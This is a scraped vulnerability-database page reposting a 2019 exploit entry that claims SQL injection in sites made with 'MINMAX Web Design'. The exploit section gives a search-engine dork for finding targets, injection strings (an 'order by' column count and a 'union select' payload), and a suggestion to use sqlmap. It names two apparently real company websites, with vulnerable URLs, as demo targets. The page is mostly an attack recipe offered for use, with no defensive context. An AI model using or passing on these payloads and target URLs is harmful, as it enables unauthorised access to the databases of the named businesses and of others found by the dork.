MINMAX Web Design - SQL Injection Vulnerability - CXSecurity.com

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1632334 漏洞类型
发布时间 2019-06-12 更新时间 2019-06-12
CVE编号 N/A CNNVD-ID N/A
漏洞平台 N/A CVSS评分 N/A
|漏洞来源
https://cxsecurity.com/issue/WLB-2019060062
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
++--++--++--++--++--++--++--++--++--++--++
# Title : SQL INJECTION Vulnerability 

# Founder : B14ck_Dz { N00b *-* } 

# Tested On : Backbox (Linux) 

# Dork : intext:"Design by MINMAX"
++--++--++--++--++--++--++--++--++--++--++

[+] Search on Engine for the Dork .

[+] Check for a Vulnerable URL .

[*] ==> https://www.akiraseiki.com/productsDia.php?d=17'

[+] Try To Inject any Query :

[!] https://www.akiraseiki.com/productsDia.php?d=17' order by 16 -- -   (to know Columns Number)

[!] https://www.akiraseiki.com/productsDia.php?d=-17' union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16 -- -   (to know the vulnerable record)

[!] ........

[+] OR U CAN USE { SQLMAP }

# Demo :

[!] https://www.akiraseiki.com/productsDia.php?d=17'
[!] https://www.cschair.com.tw/productsinfo.php?CateID=&ID=393'

GreetZ 2 : Dj3bb4ran0n  |  Waterfox  ( ͡ᵔ ͜ʖ ͡ᵔ )